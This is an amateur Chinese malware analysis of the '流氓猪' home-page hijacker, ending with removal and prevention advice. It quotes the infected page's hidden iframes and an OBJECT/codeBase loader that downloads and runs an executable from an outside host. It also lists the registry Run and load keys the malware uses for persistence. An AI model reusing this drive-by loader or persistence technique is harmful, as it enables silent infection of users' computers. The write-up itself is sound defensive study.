与“流氓猪”作战(杀毒手记)
关于“流氓猪”网页恶意代码(或者也可叫病毒,最后才发现):
(以下论述只做业余研究之用,作者:wang821002)
a.表现:默认主页被修改成以下网站:
www.fun520.com,www.ktv530.com,www.ok530.com,www.7sou.com,and so on
b.危害:
修改ie,腾汛explorer等n种浏览器的主页设置,且用一般的注册表保护修改器很难预防和彻底清除。令人厌恶!!!
c.该病毒的组成:
该恶意代码共有5个文件组成,分别是:(以xp为例,2k,98类似,系统装在c盘)
c:\Documents and Settings\%账户名%\Local Settings\Temp\ktv530.exe
c:\windows\unicall.exe
c:\windows\system32\msater.exe
c:\windows\system32\restory.exe
c:\windows\system32\sysfiler.exe
只要有任一文件留存且其被执行时,其自生自动补充其余文件。
d.察看网页源代码的分析:
★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.html:
(截取部分)
<BODY text=#000000 bgColor=#b6e06f leftMargin=0 topMargin=0><IFRAME
src="★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.files/ktv530.htm"
width=0 height=0></IFRAME><IFRAME src="mhtml:http://www.mmqm.com/555/ktv530.mht"
width=0 height=0></IFRAME>
在此处ktv530.htm被调用!
ktv530.htm:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0035)http://www.mmqm.com/555/ktv530.html -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<OBJECT codeBase=http://www.mmqm.com/555/WebDownLoadProj1.ocx#version=1,0,0,0
height=0 width=0 align=center
classid=clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D><PARAM NAME="StrUrl" VALUE="http://www.mmqm.com/555/ktv530.exe"></OBJECT></BODY></HTML>
可见他的来源是http://www.mmqm.com/555/ktv530.exe,首先被down到机器上的是这个文件,并被执行,然后产生了其余的四个文件!这时你可以在任务管理器的进程中看到msater.exe被加载。
e.修改注册表中的键值:
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Internet Explorer\Main
名称:Start Page 类型:REG_SZ 数据:www.fun520.com或www.ok530.net或www.7sou.com
(修改主页)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:load 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\MSATER.EXE
(加载程序)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:run 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\UNICALL.EXE
(检查复制程序)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:restory 类型:REG_SZ 数据:c:\windows\system32\restory.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:sysfiler 类型:REG_SZ 数据 c:\windows\system32\sysfiler.exe
(启动时自动加载)
(本人水平有限,只找到以上几个,若有其他发现不吝赐教)
f.对msater.exe(其他三个文件与其相同)的分析:
首先用language2000察看得:
版本信息:
文件名:msater.exe
注释:
版本:2.05
产品:windows
公司:流氓猪
编译器信息:
语言:C/C++
编译器:Visual C++
压缩/加密:
程序:ASPack
作者:Alexey Solodovnikov
URL:http://www.aspack.com/
尽然还打包了,有意思!!!!有趣的是当我用aspackdie解包后,我的金山毒霸2003病毒防火墙就向我发出了警告!信息如下:
文件:%path%\unpack.exe
感染:Modification.BackDoor.Generic.449 病毒
病毒介绍:
dos病毒或未知病毒。只能删除或隔离
我决定冒着危险跳过文件!!(从字面看相是个backdoor程序)
看来他并不是单纯的修改主页这么简单,大家可要看好自己的端口哦!
我想反编译这个程序来着,可惜水平有限,理解尚需时日。有那位大虾解释一下这个源程序,小弟不胜感激!
这还有一个问题就是病毒打包后就查不出来了?这个问题值得防病毒厂商好好研究研究!
g.关于这个病毒的防治:
清除:
删除上文提到的5个文件及所有相关的过期网页,删除所有提到的注册表里的键值,记得首要先把进程杀了(那5个文件加载的),在run中执行msconfig(xp,98使用),在启动项中去掉以上5个文件前面的钩(不一定全有),至此在小弟的机器上就没有再犯!
预防:
1.不打开不熟悉的网页,特别是网友发给你的,除非特别指明!!
2.注意病毒防火墙的病毒库的升级,这个还是有用的!
3.用一些注册表管理软件,其道一些防止恶意代码的作用。
4.在internet属性中的安全选项中,将安全级设到高。
......
以上是小弟在杀毒中的一点体会,就写下来工大家参考和一起研究!